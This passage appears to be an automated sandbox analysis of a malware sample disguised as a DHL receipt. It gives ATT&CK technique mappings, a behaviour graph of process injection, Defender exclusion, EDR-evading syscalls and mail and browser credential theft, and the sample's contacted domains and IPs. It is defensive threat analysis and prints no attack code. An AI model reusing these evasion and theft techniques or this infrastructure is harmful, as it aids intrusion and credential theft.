                Source: Yara matchFile source: 0000000A.00000002.2480555457.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000E.00000002.4688006537.00000000055D0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000A.00000002.2481904165.0000000000F50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

                Mitre Att&ck Matrix

                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
                Scheduled Task/Job                		1
                Scheduled Task/Job                		512
                Process Injection                		1
                Masquerading                		1
                OS Credential Dumping                		221
                Security Software Discovery                		Remote Services1
                Email Collection                		1
                Encrypted Channel                		Exfiltration Over Other Network MediumAbuse Accessibility Features
                CredentialsDomainsDefault AccountsScheduled Task/Job1
                DLL Side-Loading                		1
                Scheduled Task/Job                		11
                Disable or Modify Tools                		LSASS Memory2
                Process Discovery                		Remote Desktop Protocol1
                Archive Collected Data                		3
                Ingress Tool Transfer                		Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
                Abuse Elevation Control Mechanism                		41
                Virtualization/Sandbox Evasion                		Security Account Manager41
                Virtualization/Sandbox Evasion                		SMB/Windows Admin Shares1
                Data from Local System                		4
                Non-Application Layer Protocol                		Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook1
                DLL Side-Loading                		512
                Process Injection                		NTDS1
                Application Window Discovery                		Distributed Component Object ModelInput Capture4
                Application Layer Protocol                		Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                Deobfuscate/Decode Files or Information                		LSA Secrets1
                File and Directory Discovery                		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                Abuse Elevation Control Mechanism                		Cached Domain Credentials113
                System Information Discovery                		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items3
                Obfuscated Files or Information                		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job12
                Software Packing                		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
                Timestomp                		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron1
                DLL Side-Loading                		Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement

                Behavior Graph

                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet
                behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1627806 Sample: DHL AWB Receipt_pdf.bat.exe Startdate: 03/03/2025 Architecture: WINDOWS Score: 100 59 www.publicblockchain.xyz 2->59 61 www.031233435.xyz 2->61 63 13 other IPs or domains 2->63 75 Antivirus detection for URL or domain 2->75 77 Sigma detected: Scheduled temp file as task from temp location 2->77 79 Multi AV Scanner detection for submitted file 2->79 83 8 other signatures 2->83 10 DHL AWB Receipt_pdf.bat.exe 7 2->10         started        14 oSJLRdDbLeQ.exe 5 2->14         started        signatures3 81 Performs DNS queries to domains with low reputation 61->81 process4 file5 51 C:\Users\user\AppData\...\oSJLRdDbLeQ.exe, PE32 10->51 dropped 53 C:\Users\...\oSJLRdDbLeQ.exe:Zone.Identifier, ASCII 10->53 dropped 55 C:\Users\user\AppData\Local\...\tmpD3C2.tmp, XML 10->55 dropped 57 C:\Users\...\DHL AWB Receipt_pdf.bat.exe.log, ASCII 10->57 dropped 93 Writes to foreign memory regions 10->93 95 Adds a directory exclusion to Windows Defender 10->95 97 Injects a PE file into a foreign processes 10->97 16 RegSvcs.exe 10->16         started        19 powershell.exe 23 10->19         started        21 powershell.exe 23 10->21         started        27 3 other processes 10->27 99 Multi AV Scanner detection for dropped file 14->99 23 schtasks.exe 1 14->23         started        25 RegSvcs.exe 14->25         started        signatures6 process7 signatures8 71 Maps a DLL or memory area into another process 16->71 29 ctd5Fl0jEEYLVK.exe 16->29 injected 73 Loading BitLocker PowerShell Module 19->73 32 WmiPrvSE.exe 19->32         started        34 conhost.exe 19->34         started        36 conhost.exe 21->36         started        38 conhost.exe 23->38         started        40 conhost.exe 27->40         started        process9 signatures10 101 Found direct / indirect Syscall (likely to bypass EDR) 29->101 42 EhStorAuthn.exe 29->42         started        process11 signatures12 85 Tries to steal Mail credentials (via file / registry access) 42->85 87 Tries to harvest and steal browser information (history, passwords, etc) 42->87 89 Modifies the context of a thread in another process (thread injection) 42->89 91 3 other signatures 42->91 45 ctd5Fl0jEEYLVK.exe 42->45 injected 49 firefox.exe 42->49         started        process13 dnsIp14 65 031233435.xyz 144.76.229.203, 50010, 50011, 50012 HETZNER-ASDE Germany 45->65 67 www.publicblockchain.xyz 13.248.169.48, 58476, 58477, 58478 AMAZON-02US United States 45->67 69 8 other IPs or domains 45->69 103 Found direct / indirect Syscall (likely to bypass EDR) 45->103 signatures15

                Screenshots

                Thumbnails

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.